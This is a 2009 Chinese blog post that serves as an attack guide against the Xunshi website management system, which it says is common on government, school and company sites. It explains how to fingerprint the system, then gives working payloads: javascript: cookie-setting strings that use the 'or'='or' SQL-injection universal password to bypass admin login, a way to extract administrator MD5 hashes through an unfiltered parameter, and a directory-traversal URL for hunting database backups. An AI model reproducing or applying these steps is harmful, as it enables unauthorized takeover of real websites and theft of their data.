讯时网站管理系统漏洞
Posted by admin on 2009年04月20日 – 10:31 上午
讯时网站管理系统漏洞
这套系统有N年版,一般的政府、学校和企事业单位用得多,
特证: 显示新闻News_View.asp?NewsID= 登陆login.asp?id=3,最主要的特证是用的一个有一个EDIT目录,下面的数据库是用的db/#ewebeditor.asp
以上特证只要中二个就基本可以肯定是这套系统
漏洞:这套系统原来有N多漏洞,但经过改进,现在主要的问题是COOKIES注入和列目录问题
具体的代码我就讲了,直接讲利用
第一板斧:
老版中存在一个后台COOKIES注入
直接打开登陆后台,然后在地址栏输入
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));
这个功能就是把用户名和密码设置 为'or'='or' (这个有什么用不说了吧),还有把admindj设置为1
按回车后,直接访问 /管理目录/admin_index.asp就进后台了,后台直接有备份功能
管理目录自己找一下,一般在LOGIN.ASP的同级目录
第二析斧:
其中的投票文件过滤不严,js-xgxx.asp文件的xgnews参数没有过滤,具体的可以一朋友写的专用小工具(也可以对其它某些有COOKIES注入,但关键字和其它一些参数是固定了,作用可能不大,只是我们写来娱乐一下的,牛人不要笑)
用这个直接可以得到管理员用户名和密码的MD5
有了MD5可以去破解,如果破不了把上面的改一下
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("密码md5值"));javascript:alert(document.cookie="admindj="+escape("1"));
确定后直进后台
第三板斧:
如果以上还是不行那就看……还是cookies问题,有某些版本中过滤了COOKIES中的'号,这样我们的万能密码就起不了作用了,asp文件的COOKIES注入过没戏了,但是admindj=1还有用,输入完上面的代码后,如果还进不了后台,那就访问 /edit/admin_uploadfile.asp?id=14&dir=..,然后跟EWEBEDITOR的列目录漏洞一样,只需要改变dir=后面的参数就可以看到查应的目录,如dir=..\.. dir=..\..\..
可以找一些他的数据库备份啊或其它的.
阅读(906) | 评论(0) | 转发(0) |
